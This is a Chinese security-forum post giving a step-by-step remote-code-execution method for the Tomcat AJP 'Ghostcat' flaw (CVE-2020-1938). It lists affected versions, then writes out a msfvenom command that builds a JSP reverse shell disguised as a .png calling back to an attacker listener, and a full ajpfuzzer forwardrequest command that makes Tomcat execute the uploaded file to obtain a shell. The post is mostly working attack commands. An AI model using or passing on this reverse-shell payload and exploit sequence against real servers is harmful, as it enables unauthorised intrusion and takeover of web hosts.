请选择 进入手机版 | 继续访问电脑版
 找回密码
 立即注册

QQ登录

只需一步,快速开始

首页 安全 Web安全 查看内容

CVE-2020-1938 幽灵猫漏洞RCE

怀特怀特 2020-2-21 19:14

存在此漏洞Tomcat版本:

7.*分支7.0.100之前版本
8.*分支8.5.51之前版本
9.*分支9.0.31之前版本

漏洞原理见这里,此处只表RCE方式。

msf生成反弹马,监听

首先使用msf生成反弹shell马,为方便上传之用直接生成为.png后缀:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.211.55.5 LPORT=999 R >ma.png

在msf监听

木马执行

放入项目目录,此处假设目标机图片上传路径为/t/22

下载AJP包构造器ajpfuzzer

  1. 运行java -jar ajpfuzzer_v0.6.jar

  2. 连接目标端口connect 127.0.0.1 8009

  3. 执行如下命令构造并发送AJP包,其中/t/22/ma.png为木马路径,其中11.jsp可以换为任意该web项目中没有的jsp文件,这样tomcat才会去调用DefaultServlet
    forwardrequest 2 "HTTP/1.1" "/11.jsp" 127.0.0.1 127.0.0.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:/t/22/ma.png","javax.servlet.include.servlet_path:/"
    

    请求发送成功后ma.png被作为jsp解析,成功获取shell
分享到
文章点评
  • 怀特怀特 2020-2-22 11:54
    直接点文章中的链接啊,或者去github搜一下